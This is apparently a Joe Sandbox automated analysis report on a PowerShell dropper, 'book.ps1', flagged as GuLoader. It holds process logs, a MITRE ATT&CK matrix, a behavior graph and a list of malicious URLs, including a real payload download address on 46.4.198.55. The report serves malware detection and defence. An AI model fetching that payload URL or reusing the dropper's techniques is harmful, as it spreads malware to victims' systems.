    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		Path Interception11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Query Registry    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts111
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Security Software Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput CaptureScheduled Transfer11
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script111
    Scripting    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Obfuscated Files or Information    		Cached Domain Credentials2
    File and Directory Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 623683 Sample: book.ps1 Startdate: 10/05/2022 Architecture: WINDOWS Score: 72 32 Antivirus detection for URL or domain 2->32 34 Yara detected GuLoader 2->34 36 Potential dropper URLs found in powershell memory 2->36 9 powershell.exe 2 28 2->9         started        process3 process4 11 wscript.exe 1 1 9->11         started        14 powershell.exe 14 17 9->14         started        17 conhost.exe 9->17         started        dnsIp5 38 Wscript starts Powershell (via cmd or directly) 11->38 40 Very long command line found 11->40 42 Encrypted powershell cmdline option found 11->42 19 powershell.exe 25 11->19         started        30 46.4.198.55, 49728, 80 HETZNER-ASDE Germany 14->30 signatures6 process7 process8 21 csc.exe 19->21         started        24 conhost.exe 19->24         started        file9 28 C:\Users\user\AppData\Local\...\xtg032l3.dll, PE32 21->28 dropped 26 cvtres.exe 21->26         started        process10

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    book.ps10%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://46.4.198.55100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbsh100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~100%Avira URL Cloudmalware
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://go.microsoft.co0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs0yj100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.v100%Avira URL Cloudmalware
    http://go.micros0%URL Reputationsafe
    http://46.4.198.55x0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://46.4.198.55/10P/Sursdepa.vbstrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://46.4.198.55powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://46.4.198.55/10P/Sursdepa.vbshpowershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbspowershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://go.microsoft.copowershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://46.4.198.55/10P/Sursdepa.vbs0yjpowershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://46.4.198.55/10P/Sursdepa.vpowershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://go.microspowershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://46.4.198.55xpowershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		low

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  46.4.198.55
                  		unknownGermany
                  		24940HETZNER-ASDEfalse

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:623683
                  Start date and time: 10/05/202218:43:152022-05-10 18:43:15 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 4s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:book.ps1
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal72.troj.evad.winPS1@13/19@0/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .ps1
                  • Adjust boot time
                  • Enable AMSI

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Execution Graph export aborted for target powershell.exe, PID 3144 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 6276 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 6344 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: book.ps1

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:44:38API Interceptor106x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

